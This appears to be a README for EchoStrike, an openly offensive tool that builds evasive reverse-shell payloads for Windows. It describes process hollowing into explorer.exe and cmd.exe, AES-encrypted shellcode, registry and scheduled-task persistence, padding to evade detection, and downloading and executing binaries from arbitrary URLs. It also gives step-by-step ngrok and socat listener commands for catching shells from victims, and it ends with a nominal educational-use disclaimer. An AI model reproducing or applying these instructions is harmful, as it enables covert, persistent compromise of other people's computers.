EchoStrike is a tool designed to generate undetectable reverse shells and perform process injection on Windows systems. Through an interactive wizard written in Python, users can customize their binaries with advanced persistence and encryption techniques. The malware code is written in Go, ensuring flexibility and power to meet the attacker’s needs.

EchoStrike allows downloading binaries from any URL and executing them under suspended processes like explorer.exe or cmd.exe, ensuring discreet and covert execution. Additionally, it offers advanced options to adjust the binary size and ensure persistence on the target system.

• Interactive Wizard (Python-based): EchoStrike offers a user-friendly setup wizard, written in Python, guiding users through the customization of reverse shell payloads without the need to manually edit configuration files.
• Custom Persistence Techniques: Supports multiple persistence methods including:
  • Registry (CurrentUser Run)
  • Registry (Command Processor)
  • Task Scheduler (Admin Required)
  • Startup Folder
• AES Encryption for Payloads: Automatically generates 128-bit AES keys (16-byte hexadecimal format) to encrypt payloads before injection, ensuring shellcode is not detected in memory in its raw form.
• Binary Padding for Evasion: Adjusts the size of the generated binaries by adding padding, making it harder to detect them based on file size analysis.
• Error Logging and Process Management: Includes utilities for logging errors and managing background processes, with options to execute commands without displaying visible windows and move executables to system folders like AppData\Roaming to avoid detection.
• Process Injection: Allows for the injection of binaries within suspended processes like explorer.exe, cmd.exe, and powershell.exe, enabling in-memory execution to avoid detection.
• Dynamic Download and Execution: EchoStrike allows you to download binaries from any URL and execute them under suspended processes, ensuring discreet delivery and execution of payloads.

EchoStrike’s configuration is simple and intuitive, with just a few steps required to generate your reverse shell payload. You simply need to follow the steps provided in the terminal by the wizard:

1. Enter the IP and Port: Configure the server's IP address and port for the reverse shell connection.
2. Provide a 16-bit AES key (32 characters): Enter or generate a secure AES key to encrypt the payload.
3. Select Persistence Option: Choose from multiple persistence methods such as registry or task scheduler.
4. Select Injection Method: EchoStrike allows for various techniques, including process hollowing for shellcode injection.
5. Compile the Payload: EchoStrike will generate a binary ready for deployment with the specified options.

To ensure you receive the reverse shell, follow these steps:

1. Start a TCP connection with Ngrok: Use the following command to start a TCP connection on port 443:

   ngrok tcp 443

2. Extract the IP address: Once you get the Ngrok URL, extract the IP using this command:

   ping 0.tcp.ngrok.io:16315

3. Enter the IP and Port: Use the IP address and port you obtained in the previous step (e.g., 16315) when EchoStrike prompts you for the reverse shell details.
4. Create an OpenSSL Certificate and Key: Generate a certificate and key using the following command:

   openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

5. Listen on Port 443: Use socat to listen on port 443, where Ngrok will communicate with your local machine:

   sudo socat OPENSSL-LISTEN:443,reuseaddr,cert=cert.pem,key=key.pem,verify=0,fork stdio

Following these steps, you should successfully receive the reverse shell after the victim executes the binary generated by EchoStrike. If the victim’s machine is turned off, keep your machine in listening mode. When the machine is turned back on, and if you selected a persistence technique, you will regain the shell without any user interaction.

• Go Compiler: Install Go to compile the tool and generate your custom payloads. Follow these simple steps to install Go on Kali Linux:

  sudo apt update
  sudo apt install golang

• Python 3: Required for running the interactive wizard.

  sudo apt install python3

• Dependencies: Install the required Python libraries.

  pip install termcolor pyfiglet

  This tool can be compiled on both Windows and Linux systems, providing flexibility for different environments.

This tool is intended solely for educational purposes and for use in controlled environments. Unauthorized use of EchoStrike outside of these settings is strictly prohibited. The author, @Stiven.Hacker, takes no responsibility for any misuse or damage caused by this code.

Check out a live demonstration of EchoStrike in action